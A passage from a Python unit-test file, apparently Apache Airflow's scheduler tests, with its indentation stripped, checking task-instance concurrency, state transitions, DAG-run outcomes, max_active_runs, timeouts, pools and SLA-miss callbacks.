session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.state = State.SCHEDULED
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.SCHEDULED)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr.refresh_from_db(session=session)
dr.state = State.FAILED
# why o why
session.merge(dr)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.NONE)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
